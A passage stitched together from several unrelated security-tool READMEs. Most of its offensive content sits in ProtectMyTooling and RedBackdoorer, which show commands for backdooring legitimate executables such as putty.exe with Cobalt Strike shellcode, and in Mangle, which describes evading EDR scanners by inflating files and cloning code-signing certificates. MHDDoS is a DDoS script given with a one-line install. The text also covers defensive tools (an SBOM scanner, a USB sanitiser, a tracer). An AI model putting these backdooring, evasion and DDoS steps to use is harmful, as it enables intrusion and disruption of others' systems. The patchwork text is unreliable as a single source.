| 20 | pe2shc | open-source | Shellcode Converter | PE | Shellcode | @hasherezade |
| 21 | pecloak | open-source | PE EXE/DLL Protector | PE | PE | Mike Czumak, @SecuritySift, buherator / v-p-b |
| 22 | peresed | open-source | PE EXE/DLL Protector | PE | PE | Martin Vejnár, Avast |
| 23 | scarecrow | open-source | Shellcode Loader | Shellcode | DLL, JScript, CPL, XLL | Matt Eidelberg (@Tyl0us) |
| 24 | sgn | open -source | Shellcode Encoder | Shellcode | Shellcode | Ege Balci |
| 25 | smartassembly | commercial | .NET Obfuscator | .NET | .NET | Red-Gate |
| 26 | srdi | open-source | Shellcode Encoder | DLL | Shellcode | Nick Landers, @monoxgas |
| 27 | themida | commercial | PE EXE/DLL Protector | PE | PE | Oreans |
| 28 | upx | open-source | PE EXE/DLL Compressor | PE | PE | Markus F.X.J. Oberhumer, László Molnár, John F. Reiser |
| 29 | vmprotect | commercial | PE EXE/DLL Protector | PE | PE | vmpsoft |
+----+----------------+-------------+-----------------------+-----------------------------+------------------------+--------------------------------------------------------+
Above are the packers that are supported, but that doesn't mean that you have them configured and ready to use. To prepare their usage, you must first supply necessary binaries to the contrib
directory and then configure your YAML file accordingly.
This program is intended for professional Red Teams and is perfect to be used in a typical implant-development CI/CD pipeline. As a red teamer I'm always expected to deliver decent quality list of IOCs matching back to all of my implants as well as I find it essential to watermark all my implants for bookkeeping, attribution and traceability purposes.
To accommodate these requirements, ProtectMyTooling brings basic support for them.
ProtectMyTooling
can apply watermarks after obfuscation rounds simply by using --watermark
option.:
py ProtectMyTooling [...] -w dos-stub=fooooobar -w checksum=0xaabbccdd -w section=.coco,ALLYOURBASEAREBELONG
There is also a standalone approach, included in RedWatermarker.py
script.
It takes executable artifact on input and accepts few parameters denoting where to inject a watermark and what value shall be inserted.
Example run will set PE Checksum to 0xAABBCCDD, inserts foooobar
to PE file's DOS Stub (bytes containing This program cannot be run...), appends bazbazbaz
to file's overlay and then create a new PE section named .coco
append it to the end of file and fill that section with preset marker.
py RedWatermarker.py beacon-obf.exe -c 0xaabbccdd -t fooooobar -e bazbazbaz -s .coco,ALLYOURBASEAREBELONG
Full watermarker usage:
cmd> py RedWatermarker.py --help
;
ED.
,E#Wi
j. f#iE###G.
EW, .E#t E#fD#W;
E##j i#W, E#t t##L
E###D. L#D. E#t .E#K,
E#jG#W; :K#Wfff; E#t j##f
E#t t##f i##WLLLLtE#t :E#K:
E#t :K#E: .E#L E#t t##L
E#KDDDD###i f#E: E#t .D#W; ,; G: ,;
E#f,t#Wi,,, ,WW; E#tiW#G. f#i j. j. E#, : f#i j.
E#t ;#W: ; .D#;E#K##i .. GEEEEEEEL .E#t EW, .. : .. EW, E#t .GE .E#t EW,
DWi ,K.DL ttE##D. ;W, ,;;L#K;;. i#W, E##j ,W, .Et ;W, E##j E#t j#K; i#W, E##j
f. :K#L LWL E#t j##, t#E L#D. E###D. t##, ,W#t j##, E###D. E#GK#f L#D. E###D.
EW: ;W##L .E#f L: G###, t#E :K#Wfff; E#jG#W; L###, j###t G###, E#jG#W; E##D. :K#Wfff; E#jG#W;
E#t t#KE#L ,W#; :E####, t#E i##WLLLLt E#t t##f .E#j##, G#fE#t :E####, E#t t##f E##Wi i##WLLLLt E#t t##f
E#t f#D.L#L t#K: ;W#DG##, t#E .E#L E#t :K#E: ;WW; ##,:K#i E#t ;W#DG##, E#t :K#E:E#jL#D: .E#L E#t :K#E:
E#jG#f L#LL#G j###DW##, t#E f#E: E#KDDDD###i j#E. ##f#W, E#t j###DW##, E#KDDDD###E#t ,K#j f#E: E#KDDDD###i
E###; L###j G##i,,G##, t#E ,WW; E#f,t#Wi,,,.D#L ###K: E#t G##i,,G##, E#f,t#Wi,,E#t jD ,WW; E#f,t#Wi,,,
E#K: L#W; :K#K: L##, t#E .D#; E#t ;#W: :K#t ##D. E#t :K#K: L##, E#t ;#W: j#t .D#; E#t ;#W:
EG LE. ;##D. L##, fE tt DWi ,KK:... #G .. ;##D. L##, DWi ,KK: ,; tt DWi ,KK:
; ;@ ,,, .,, : j ,,, .,,
Watermark thy implants, track them in VirusTotal
Mariusz Banach / mgeeky '22, (@mariuszbit)
<mb@binary-offensive.com>
usage: RedWatermarker.py [options] <infile>
options:
-h, --help show this help message and exit
Required arguments:
infile Input implant file
Optional arguments:
-C, --check Do not actually inject watermark. Check input file if it contains specified watermarks.
-v, --verbose Verbose mode.
-d, --debug Debug mode.
-o PATH, --outfile PATH
Path where to save output file with watermark injected. If not given, will modify infile.
PE Executables Watermarking:
-t STR, --dos-stub STR
Insert watermark into PE DOS Stub (Th is program cannot be run...).
-c NUM, --checksum NUM
Preset PE checksum with this value (4 bytes). Must be number. Can start with 0x for hex value.
-e STR, --overlay STR
Append watermark to the file's Overlay (at the end of the file).
-s NAME,STR, --section NAME,STR
Append a new PE section named NAME and insert watermark there. Section name must be shorter than 8 characters. Section will be marked Read-Only, non-executable.
Currently only PE files watermarking is supported, but in the future Office documents and other formats are to be added as well.
IOCs may be collected by simply using -i
option in ProtectMyTooling
run.
They're being collected at the following phases:
They will contain following fields saved in form of a CSV file:
timestamp
filename
author
- formed as username@hostname
context
- whether a record points to an input, output or intermediary filecomment
- value adjusted by the user through -I value
optionmd5
sha1
sha256
imphash
- PE Imports Hash, if availabletyperef_hash
- .NET TypeRef Hash, if availableResulting will be a CSV file named outfile-ioc.csv
stored side by side to generated output artifact. That file is written in APPEND mode, meaning it will receive all subsequent IOCs.
ProtectMyTooling
utilizes my own RedBackdoorer.py
script which provides few methods for backdooring PE executables. Support comes as a dedicated packer named backdoor
. Example usage:
Takes Cobalt Strike shellcode on input and encodes with SGN (Shikata Ga-Nai) then backdoors SysInternals DbgView64.exe then produces Amber EXE reflective loader
PS> py ProtectMyTooling.py sgn,backdoor,amber beacon64.bin dbgview64-infected.exe -B dbgview64.exe
::::::::::.:::::::.. ... :::::::::::.,:::::: .,-::::::::::::::::
`;;;```.;;;;;;``;;;; .;;;;;;;;;;;;;;;;;;;,;;;'````;;;;;;;;
`]]nnn]]' [[[,/[[[' ,[[ \[[, [[ [[cccc [[[ [[
$$$"" $$$$$$c $$$, $$$ $$ $$"""" $$$ $$
888o 888b "88bo"888,_ _,88P 88, 888oo,_`88bo,__,o, 88,
. YMMMb :.-:.MM ::-. "YMMMMMP" MMM """"YUMMM"YUMMMMMP" MMM
;;,. ;;;';;. ;;;;'
[[[[, ,[[[[, '[[,[[['
$$$$$$$$"$$$ c$$"
888 Y88" 888o,8P"`
::::::::::::mM... ... ::: :::::. :::. .,-:::::/
;;;;;;;;.;;;;;;;. .;;;;;;;. ;;; ;;`;;;;, `;;,;;-'````'
[[ ,[[ \[[,[[ \[[,[[[ [[[ [[[[[. '[[[[ [[[[[[/
$$ $$$, $$$$$, $$$$$' $$$ $$$ "Y$c$"$$c. "$$
88, "888,_ _,88"888,_ _,88o88oo,._888 888 Y88`Y8bo,,,o88o
MMM "YMMMMMP" "YMMMMMP"""""YUMMMMM MMM YM `'YMUP"YMM
Red Team implants protection swiss knife.
Multi-Packer wrapping around multitude of packers, protectors, shellcode loaders, encoders.
Mariusz Banach / mgeeky '20-'22, <mb@binary-offensive.com>
v0.15
[.] Processing x64 file : beacon64.bin
[>] Generating output of sgn(<file>)...
[>] Generating output of backdoor(sgn(<file>))...
[>] Generating output of Amber(backdoor(sgn(<file>)))...
[+] SUCCEEDED. Original file size: 265959 bytes, new file size Amber(backdoor(sgn(<file>))): 1372672, ratio: 516.12%
Full RedBackdoorer usage:
cmd> py RedBackdoorer.py --help
██▀███ ▓█████▓█████▄
▓██ ▒ ██▓█ ▀▒██▀ ██▌
▓██ ░▄█ ▒███ ░██ █▌
▒██▀▀█▄ ▒▓█ ▄░▓█▄ ▌
░██▓ ▒██░▒████░▒████▓
░ ▒▓ ░▒▓░░ ▒░ ░▒▒▓ ▒
░▒ ░ ▒░░ ░ ░░ ▒ ▒
░░ ░ ░ ░ &# 9617; ░
▄▄▄▄ ▄▄▄░ ░ ▄████▄ ██ ▄█▓█████▄ ▒█████ ▒█████ ██▀███ ▓█████ ██▀███
▓█████▄▒████▄ ░▒██▀ ▀█ ██▄█▒▒██▀ ██▒██▒ ██▒██▒ ██▓██ ▒ ██▓█ ▀▓██ ▒ ██▒
▒██▒ ▄█▒██ ▀█▄ ▒▓█ 	 604;▓███▄░░██ █▒██░ ██▒██░ ██▓██ ░▄█ ▒███ ▓██ ░▄█ ▒
▒██░█▀ ░██▄▄▄▄██▒▓▓▄ ▄██▓██ █▄░▓█▄ ▒██ ██▒██ ██▒██▀▀█▄ ▒▓█ ▄▒██▀▀█▄
░▓█ ▀█▓▓█ ▓██▒ ▓███▀ ▒██▒ █░▒████▓░ ████▓▒ ░ ████▓▒░██▓ ▒██░▒████░██▓ ▒██▒
░▒▓███▀▒▒▒ ▓▒█░ ░▒ ▒ ▒ ▒▒ ▓▒▒▒▓ ▒░ ▒░▒░▒░░ ▒░▒░▒░░ ▒▓ ░▒▓░░ ▒░ ░ ▒▓ ░▒▓░
▒░▒ ░ ▒ ▒▒ ░ ░ ▒ ░ ░▒ ▒░░ ▒ ▒ ░ ▒ ▒░ ░ ▒ ▒░ ░▒ ░ ▒░░ ░ ░ ░▒ ░ ▒░
░ ░ ░ ▒ 	 617; ░ ░░ ░ ░ ░ ░░ ░ ░ ▒ ░ ░ ░ ▒ ░░ ░ ░ ░░ ░
░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░
░ ░ ░
Your finest PE backdooring companion.
Mariusz Banach / mgeeky '22, (@mariuszbit)
<mb@binary-offensive.com>
usage: RedBackdoorer.py [options] <mode> <shellcode> <infile>
options:
-h, --help show this help message and exit
Required arguments:
mode PE Injection mode, see help epilog for more details.
shellcode Input shellcode file
infile PE file to backdoor
Optional arguments:
-o PATH, --outfil e PATH
Path where to save output file with watermark injected. If not given, will modify infile.
-v, --verbose Verbose mode.
Backdooring options:
-n NAME, --section-name NAME
If shellcode is to be injected into a new PE section, define that section name. Section name must not be longer than 7 characters. Default: .qcsw
-i IOC, --ioc IOC Append IOC watermark to injected shellcode to facilitate implant tracking.
Authenticode signature options:
-r, --remove-signature
Remove PE Authenticode digital signature since its going to be invalidated anyway.
------------------
PE Backdooring <mode> consists of two comma-separated options.
First one denotes where to store shellcode, second how to run it:
<mode>
save,run
| |
| +---------- 1 - change AddressOfEntryPoint
| 2 - hijack branching instruction at Original Entry Point (jmp, call, ...)
| 3 - setup TLS callback
|
+-------------- 1 - store shellcode in the middle of a code section
2 - append shellcode to the PE file in a new PE section
Example:
py RedBackdoorer.py 1,2 beacon.bin putty.exe putty-infected.exe
There is also a script that integrates ProtectMyTooling.py
used as a wrapper around configured PE/.NET Packers/Protectors in order to easily transform input executables into their protected and compressed output forms and then upload or use them from within CobaltStrike.
The idea is to have an automated process of protecting all of the uploaded binaries or .NET assemblies used by execute-assembly and forget about protecting or obfuscating them manually before each usage. The added benefit of an automated approach to transform executables is the ability to have the same executable protected each time it's used, resulting in unique samples launched on target machines. That should nicely deceive EDR/AV enterprise-wide IOC sweeps while looking for the same artefact on different machines.
Additionally, the protected-execute-assembly command has the ability to look for assemblies of which only name were given in a preconfigured assemblies directory (set in dotnet_assemblies_directory setting).
To use it:
CobaltStrike/ProtectMyTooling.cna
in your Cobalt Strike.protected-execute-assembly
- Executes a local, previously protected and compressed .NET program in-memory on target.protected-upload
- Takes an input file, protects it if its PE executable and then uploads that file to specified remote location.Basically these commands will open input files, pass the firstly to the CobaltStrike/cobaltProtectMyTooling.py
script, which in turn calls out to ProtectMyTooling.py
. As soon as the binary gets obfuscated, it will be passed to your beacon for execution/uploading.
Here's a list of options required by the Cobalt Strike integrator:
python3_interpreter_path
- Specify a path to Python3 interpreter executableprotect_my_tooling_dir
- Specify a path to ProtectMyTooling main directoryprotect_my_tooling_config
- Specify a path to ProtectMyTooling configuration file with various packers optionsdotnet_assemblies_directory
- Specify local path .NET assemblies should be looked for if not found by execute-assemblycache_protected_executables
- Enable to cache already protected executables and reuse them when neededprotected_executables_cache_dir
- Specify a path to a directory that should store cached protected executablesdefault_exe_x86_packers_chain
- Native x86 EXE executables protectors/packers chaindefault_exe_x64_packers_chain
- Native x64 EXE executables protectors/packers chaindefault_dll_x86_packers_chain
- Native x86 DLL executables protectors/packers chaindefault_dll_x64_packers_chain
- Native x64 DLL executables protectors/packers chaindefault_dotnet_packers_chain
- .NET executables protectors/packers chainScareCrow
is very tricky to run from Windows. What worked for me is following: bash.exe
command available in Windows)golang
installed in WSL at version 1.16+
(tested on 1.18
)PackerScareCrow.Run_ScareCrow_On_Windows_As_WSL = True
setAll packer, obfuscator, converter, loader credits goes to their authors. This tool is merely a wrapper around their technology!
ProtectMyTooling also uses denim.exe
by moloch-- by some Nim-based packers.
GadgetToJScript
Limelighter
PEZor
msfevenom
- two variants, one for input shellcode, the other for executableUse of this tool as well as any other projects I'm author of for illegal purposes, unsolicited hacking, cyber-espionage is strictly prohibited. This and other tools I distribute help professional Penetration Testers, Security Consultants, Security Engineers and other security personnel in improving their customer networks cyber-defence capabilities.
In no event shall the authors or copyright holders be liable for any claim, damages or other liability arising from illegal use of this software.
If there are concerns, copyright issues, threats posed by this software or other inquiries - I am open to collaborate in responsibly addressing them.
The tool exposes handy interface for using mostly open-source or commercially available packers/protectors/obfuscation software, therefore not introducing any immediately new threats to the cyber-security landscape as is.
This and other projects are outcome of sleepless nights and plenty of hard work. If you like what I do and appreciate that I always give back to the community, Consider buying me a coffee (or better a beer) just to say thank you!
Mariusz Banach / mgeeky, '20-'22
<mb [at] binary-offensive.com>
(https://github.com/mgeeky)
Authored By Tyl0us
Featured at Source Zero Con 2022
Mangle is a tool that manipulates aspects of compiled executables (.exe or DLL). Mangle can remove known Indicators of Compromise (IoC) based strings and replace them with random characters, change the file by inflating the size to avoid EDRs, and can clone code-signing certs from legitimate files. In doing so, Mangle helps loaders evade on-disk and in-memory scanners.
Mangle was developed in Golang.
The first step, as always, is to clone the repo. Before you compile Mangle, you'll need to install the dependencies. To install them, run the following commands:
go get github.com/Binject/debug/pe
Then build it
go build Mangle.go
While Mangle is written in Golang, a lot of the features are designed to work on executable files from other languages. At the time of release, the only feature that is Golang specific is the string manipulation part.
./mangle -h
_____ .__
/ \ _____ ____ ____ | | ____
/ \ / \\__ \ / \ / ___\| | _/ __ \
/ Y \/ __ \| | \/ /_/ > |_\ ___/
\____|__ (____ /___| /\___ /|____/\___ >
\/ \/ \//_____/ \/
(@Tyl0us)
Usage of ./Mangle:
-C string
Path to the file containing the certificate you want to clone
-I string
Path to the orginal file
-M Edit the PE file to strip out Go indicators
-O string
The new file name
-S int
How many MBs to increase the file by
Mangle takes the input executable and looks for known strings that security products look for or alert on. These strings alone are not the sole point of detection. Often, these strings are in conjunction with other data points and pieces of telemetry for detection and prevention. Mangle finds these known strings and replaces the hex values with random ones to remove them. IMPORTANT: Mangle replaces the exact size of the strings it’s manipulating. It doesn’t add any more or any less, as this would create misalignments and instabilities in the file. Mangle does this using the -M
command-line option.
Currently, Mangle only does Golang files but as time goes on other languages will be added. If you know of any for other languages, please open an issue ticket and submit them.
Before
After
Pretty much all EDRs can’t scan both on disk or in memory files beyond a certain size. This simply stems from the fact that large files take longer to review, scan, or monitor. EDRs do not want to impact performance by slowing down the user's productivity. Mangle inflates files by creating a padding of Null bytes (Zeros) at the end of the file. This ensures that nothing inside the file is impacted. To inflate an executable, use the -S
command-line option along with the number of bytes you want to add to the file. Large payloads are really not an issue anymore with how fast Internet speeds are, that being said, it's not recommended to make a 2 gig file.
Based on test cases across numerous userland and kernel EDRs, it is recommended to increase the size by either 95-100 megabytes. Because vendors do not check large files, the activity goes unnoticed, resulting in the successful execution of shellcode.
Mangle also contains the ability to take the full chain and all attributes from a legitimate code-signing certificate from a file and copy it onto another file. This includes the signing date, counter signatures, and other measurable attributes.
While this feature may sound similar to another tool I developed, Limelighter, the major difference between the two is that Limelighter makes a fake certificate based off a domain and signs it with the current date and time, versus using valid attributes where the timestamp is taken from when the original file. This option can use DLL or .exe files to copy using the -C
command-line option, along with the path to the file you want to copy the certificate from.
bomber
is an application that scans SBOMs for security vulnerabilities.
So you've asked a vendor for an Software Bill of Materials (SBOM) for one of their closed source products, and they provided one to you in a JSON file... now what?
The first thing you're going to want to do is see if any of the components listed inside the SBOM have security vulnerabilities, and what kind of licenses these components have. This will help you identify what kind of risk you will be taking on by using the product. Finding security vulnerabilities and license information for components identified in an SBOM is exactly what bomber
is meant to do. bomber
can read any JSON or XML based CycloneDX format, or a JSON SPDX or Syft formatted SBOM, and tell you pretty quickly if there are any vulnerabilities.
There are quite a few SBOM formats available today. bomber
supports the following:
bomber
supports multiple sources for vulnerability information. We call these providers. Currently, bomber
uses OSV as the default provider, but you can also use the Sonatype OSS Index.
Please note that each provider supports different ecosystems, so if you're not seeing any vulnerabilities in one, try another. It is also important to understand that each provider may report different vulnerabilities. If in doubt, look at a few of them.
If bomber
does not find any vulnerabilities, it doesn't mean that there aren't any. All it means is that the provider being used didn't detect any, or it doesn't support the ecosystem. Some providers have vulnerabilities that come back with no Severity information. In this case, the Severity will be listed as "UNDEFINED"
An ecosystem is simply the package manager, or type of package. Examples include rpm, npm, gems, etc. Each provider supports different ecosystems.
OSV is the default provider for bomber
. It is an open, precise, and distributed approach to producing and consuming vulnerability information for open source.
You don't need to register for any service, get a password, or a token. Just use bomber
without a provider flag and away you go like this:
bomber scan test.cyclonedx.json
At this time, the OSV supports the following ecosystems:
and others...
The OSV provider is pretty slow right now when processing large SBOMs. At the time of this writing, their batch endpoint is not functioning, so bomber
needs to call their API one package at a time.
Additionally, there are cases where OSV does not return a Severity, or a CVE/CWE. In these rare cases, bomber
will output "UNSPECIFIED", and "UNDEFINED" respectively.
In order to use bomber
with the Sonatype OSS Index you need to get an account. Head over to the site, and create a free account, and make note of your username
(this will be the email that you registered with).
Once you log in, you'll want to navigate to your settings and make note of your API token
. Please don't share your token with anyone.
At this time, the Sonatype OSS Index supports the following ecosystems:
You can use Homebrew to install bomber
using the following:
brew tap devops-kung-fu/homebrew-tap
brew install devops-kung-fu/homebrew-tap/bomber
If you do not have Homebrew, you can still download the latest release (ex: bomber_0.1.0_darwin_all.tar.gz
), extract the files from the archive, and use the bomber
binary.
If you wish, you can move the bomber
binary to your /usr/local/bin
directory or anywhere on your path.
To install bomber
, download the latest release for your platform and install locally. For example, install bomber
on Ubuntu:
dpkg -i bomber_0.1.0_linux_arm64.deb
You can scan either an entire folder of SBOMs or an individual SBOM with bomber
. bomber
doesn't care if you have multiple formats in a single folder. It'll sort everything out for you.
Note that the default output for bomber
is to STDOUT. Options to output in HTML or JSON are described later in this document.
# Using OSV (the default provider) which does not require any credentials
bomber scan spdx.sbom.json
# Using a provider that requires credentials (ossindex)
bomber scan --provider=xxx --username=xxx --token=xxx spdx-sbom.json
If the provider finds vulnerabilities you'll see an output similar to the following:
If the provider doesn't return any vulnerabilities you'll see something like the following:
This is good for when you receive multiple SBOMs from a vendor for the same product. Or, maybe you want to find out what vulnerabilities you have in your entire organization. A folder scan will find all components, de-duplicate them, and then scan them for vulnerabilities.
# scan a folder of SBOMs (the following command will scan a folder in your current folder named "sboms")
bomber scan --username=xxx --token=xxx ./sboms
You'll see a similar result to what a Single SBOM scan will provide.
If you would like a readable report generated with detailed vulnerability information, you can utilized the --output
flag to save a report to an HTML file.
Example command:
bomber scan bad-bom.json --output=html
This will save a file in your current folder in the format "YYYY-MM-DD-HH-MM-SS-bomber-results.html". If you open this file in a web browser, you'll see output like the following:
bomber
can output vulnerability data in JSON format using the --output
flag. The default output is to STDOUT. There is a ton of more information in the JSON output than what gets displayed in the terminal. You'll be able to see a package description and what it's purpose is, what the vulnerability name is, a summary of the vulnerability, and more.
Example command:
bomber scan bad-bom.json --output=json
If you wish, you can set two environment variables to store your credentials, and not have to type them on the command line. Check out the Environment Variables information later in this README.
If you don't want to enter credentials all the time, you can add the following to your .bashrc
or .bash_profile
export BOMBER_PROVIDER_USERNAME={{your OSS Index user name}}
export BOMBER_PROVIDER_TOKEN={{your OSS Index API Token}}
If you want to kick the tires on bomber
you'll find a selection of test SBOMs in the test folder.
--license
. If you need license info, make sure you ask for it with the SBOM.bomber
needs to send one PURL at a time to get vulnerabilities back, so in a big SBOM it will take some time. We'll keep an eye on that.If you would like to contribute to the development of bomber
please refer to the CONTRIBUTING.md file in this repository. Please read the CODE_OF_CONDUCT.md file before contributing.
bomber
uses Syft to generate a Software Bill of Materials every time a developer commits code to this repository (as long as Hookzis being used and is has been initialized in the working directory). More information for CycloneDX is available here.
The current CycloneDX SBOM for bomber
is available here.
A big thank-you to our friends at Smashicons for the bomber
logo.
Big kudos to our OSS homies at Sonatype for providing a wicked tool like the Sonatype OSS Index.
ShoMon is a Shodan alert feeder for TheHive written in GoLang. With version 2.0, it is more powerful than ever!
Can be used as Webhook OR Stream listener
Utilizes shadowscatcher/shodan (fantastic work) for Shodan interaction.
Console logs are in JSON format and can be ingested by any other further log management tools
CI/CD via Github Actions ensures that a proper Release with changelogs, artifacts, images on ghcr and dockerhub will be provided
Provides a working docker-compose file file for TheHive, dependencies
Super fast and Super mini in size
Complete code refactoring in v2.0 resulted in more modular, maintainable code
Via conf file or environment variables alert specifics including tags, type, alert-template can be dynamically adjusted. See config file.
Full banner can be included in Alert with direct link to Shodan Finding.
IP is added to observables
Parameters should be provided via conf.yaml
or environment variables. Please see config file and docker-compose file
After conf or environment variables are set simply issue command:
./shomon
go build .
go build -ldflags="-s -w" .
could be used to customize compilation and produce smaller binary.docker pull ghcr.io/kaansk/shomon
docker pull kaansk/shomon
docker build -t shomon .
docker run -it shomon
docker-compose run -d
usbsas is a free and open source (GPLv3) tool and framework for securely reading untrusted USB mass storage devices.
Following the concept of defense in depth and the principle of least privilege, usbsas's goal is to reduce the attack surface of the USB stack. To achieve this, most of the USB related tasks (parsing USB packets, SCSI commands, file systems etc.) usually executed in (privileged) kernel space has been moved to user space and separated in different processes (microkernel style), each being executed in its own restricted secure computing mode.
The main purpose of this project is to be deployed as a kiosk / sheep dip station to securely transfer files from an untrusted USB device to a trusted one.
It works on GNU/Linux and is written in Rust.
usbsas can:
uas
, usb_storage
and the file system ones). Supported file systems are FAT
, exFat
, ext4
, NTFS
and ISO9660
FAT
, exFAT
and NTFS
Applications built on top of usbsas:
$ cargo doc
Any contribution is welcome, be it code, bug report, packaging, documentation or translation.
Dependencies included in this project:
ntfs3g
is GPLv2 (see ntfs3g/src/ntfs-3g/COPYING).FatFs
has a custom BSD-style license (see ff/src/ff/LICENSE.txt)fontawesome
is CC BY 4.0 (icons), SIL OFL 1.1 (fonts) and MIT (code) (see client/web/static/fontawesome/LICENSE.txt)bootstrap
is MIT (see client/web/static/bs/LICENSE)Lato
font is SIL OFL 1.1 (see client/web/static/fonts/LICENSE.txt)usbsas is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version.
usbsas is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.
You should have received a copy of the GNU General Public License along with usbsas. If not, see the gnu.org web site.
Best DDoS Attack Script Python3, (Cyber / DDos) Attack With 56 Methods
Please Don't Attack websites without the owners consent.
python3 start.py tools
You can download it from GitHub Releases
Requirements
Videos
Tutorial
You can read it from GitHub Wiki
Clone and Install Script
git clone https://github.com/MatrixTM/MHDDoS.git
cd MHDDoS
pip install -r requirements.txt
One-Line Installing on Fresh VPS
apt -y update && apt -y install curl wget libcurl4 libssl-dev python3 python3-pip make cmake automake autoconf m4 build-essential ruby perl golang git && git clone https://github.com/MatrixTM/MHDDoS.git && cd MH* && pip3 install -r requirements.txt
PartyLoud is a highly configurable and straightforward free tool that helps you prevent tracking directly from your linux terminal, no special skills required. Once started, you can forget it is running. It provides several flags; each flag lets you customize your experience and change PartyLoud behaviour according to your needs.
This project was inspired by noisy.py
Clone the repository:
git clone https://github.com/realtho/PartyLoud.git
Navigate to the directory and make the script executable:
cd PartyLoud
chmod +x partyloud.sh
Run 'partyloud':
./partyloud.sh
Usage: ./partyloud.sh [options...]
-d --dns <file> DNS Servers are sourced from specified FILE,
each request will use a different DNS Server
in the list
!!WARNING THIS FEATURE IS EXPERIMENTAL!!
!!PLEASE LET ME KNOW ISSUES ON GITHUB !!
-l --url-list <file> read URL list from specified FILE
-b --blocklist <file> read blocklist from specified FILE
-p --http-proxy <http://ip:port> set a HTTP proxy
-s --https-proxy <https://ip:port> set a HTTPS proxy
-n --no-wait disable wait between one request and an other
-h --help dispaly this help
In current release there is no input-validation on files.
If you find bugs or have suggestions on how to improve this features please help me by opening issues on GitHub
Default files are located in:
Please note that file name and extension are not important, just content of files matter
badwords is a keywords-based blocklist used to filter non-HTML content, images, document and so on.
The default config as been created after several weeks of testing. If you really think you need a custom blocklist, my suggestion is to start by copy and modifying default config according to your needs.
Here are some hints on how to create a great blocklist file:
DO ✅ | DONT
|
---|---|
Use only ASCII chars | Define one-site-only rules |
Try to keep the rules as general as possible | Define case-sensitive rules |
Prefer relative path | Place more than one rule per line |
partyloud.conf is a ULR List used as starting point for fake navigation generators.
The goal here is to create a good list of sites containing a lot of URLs.
Aside suggesting you not to use google, youtube and social networks related links, I've really no hints for you.
DNSList is a List of DNS used as argument for random DNS feature. Random DNS is not enable by default, so the “default file” is really just a guide line and a test used while developing the function to se if everything was working as expected.
The only suggestion here is to add as much address as possible to increase randomness.
penguinTrace is intended to help build an understanding of how programs run at the hardware level. It provides a way to see what instructions compile to, and then step through those instructions and see how they affect machine state as well as how this maps back to variables in the original program. A bit more background is available on the website.
penguinTrace starts a web-server which provides a web interface to edit and run code. Code can be developed in C, C++ or Assembly. The resulting assembly is then displayed and can then be stepped through, with the values of hardware registers and variables in the current scope shown.
penguinTrace runs on Linux and supports the AMD64/X86-64 and AArch64 architectures. penguinTrace can run on other operating systems using Docker, a virtual machine or through the Windows Subsystem for Linux (WSL).
The primary goal of penguinTrace is to allow exploring how programs execute on a processor, however the development provided an opportunity to explore how debuggers work and some lower-level details of interaction with the kernel.
Note: penguinTrace allows running arbitrary code as part of its design. By default it will only listen for connections from the local machine. It should only be configured to listen for remote connections on a trusted network and not exposed to the interface. This can be mitigated by running penguinTrace in a container, and a limited degree of isolation of stepped code can be provided when
libcap
is available.
penguinTrace requires 64-bit Linux running on a X86-64 or AArch64 processor. It can also run on a Raspberry Pi running a 64-bit (AArch64) Linux distribution. For other operating systems, it can be run on Windows 10 using the Windows Subsystem for Linux (WSL) or in a Docker container. WSL does not support tracee process isolation.
python
clang
llvm
llvm-dev
libclang-dev
libcap-dev # For containment
To build penguinTrace outside of a container, clone the repository and run make
. The binaries will be placed in build/bin
by default.
To build penguinTrace in Docker, run docker build -t penguintrace github.com/penguintrace/penguintrace
.
Once penguinTrace is built, running the penguintrace
binary will start the server.
If built in a container it can then be run with docker run -it -p 127.0.0.1:8080:8080 --tmpfs /tmp:exec --cap-add=SYS_PTRACE --cap-add=SYS_ADMIN --rm --security-opt apparmor=unconfined penguintrace penguintrace
. See Containers for details on better isolating the container.
Then navigate to 127.0.0.1:8080 or localhost:8080 to access the web interface.
Note: In order to run on port 80, you can modify the
docker run
command to map from port 8080 to port 80, e.g.-p 127.0.0.1:80:8080
.If built locally, you can modify the binary to allow it to bind to port 80 with
sudo setcap CAP_NET_BIND_SERVICE=+ep penguintrace
. It can then be run withpenguintrace -c SERVER_PORT 80
penguinTrace defaults to port 8080 as it is intended to be run as an unprivileged user.
The penguinTrace server uses the system temporary directory as a location for compiled binaries and environments for running traced processes. If the PENGUINTRACE_TMPDIR
environment variable is defined, this directory will be used. It will fall back to the TMPDIR
environment variable and finally the directories specified in the C library.
This must correspond to a directory without noexec
set, if running in a container it is likely the filesystem will have this set by default.
By default penguinTrace only listens on the loopback device and IPv4. If the server is configured to listen on all addresses, then also setting the server to IPv6 will allow connections on both IPv4 and IPv6, this is the default mode when running in a Docker container.
This is because penguinTrace only creates a single thread to listen to connections and so can currently only bind to a single address or all addresses.
By default penguinTrace runs in multiple session mode, each time code is compiled a new session is created. The URL fragment (after the '#') of the UI is updated with the session id, and this URL can be used to reconnect to the same session.
If running in single session mode each penguinTrace instance only supports a single debugging instance. The web UI will automatically reconnect to a previous session. To support multiple sessions, multiple instances should be launched which are listening on different ports.
The docker_build.sh
and docker_run.sh
scripts provide an example of how to run penguinTrace in a Docker container. Dockerfile_noisolate
provides an alterative way of running that does not require the SYS_ADMIN
capability but provides less isolation between the server and the traced processes. The SYS_PTRACE
capability is always required for the server to trace processes. misc/apparmor-profile
provides an example AppArmor profile that is suitable for running penguinTrace but may need some customisation for the location of temporary directories and compilers.
penguinTrace will only run under a 64-bit operating system. The official operating systems provided for the Raspberry Pi are all 32-bit, to run penguinTrace something such as pi64 or Arch Linux Arm is required.
Full instructions for setting up a 64-bit OS on Raspberry Pi TBD.
penguinTrace is developed by Alex Beharrell.
This project is licensed under the GNU AGPL. A non-permissive open source license is chosen as the intention of this project is educational, and so any derivative works should have the source available so that people can learn from it.
The bundling of the source code relies on the structure of the repository. Derivative works that are not forked from a penguinTrace repository will need to modify the Makefile rules for static/source.tar.gz
to ensure the modified source is correctly distributed.
penguinTrace makes use of jQuery and CodeMirror for some aspects of the web interface. Both are licensed under the MIT License. It also uses the Major Mono font which is licensed under the Open Font License.
This is a tool used to discover endpoints (and potential parameters) for a given target. It can find them by:
The python script is based on the link finding capabilities of my Burp extension GAP. As a starting point, I took the amazing tool LinkFinder by Gerben Javado, and used the Regex for finding links, but with additional improvements to find even more.
xnLinkFinder supports Python 3.
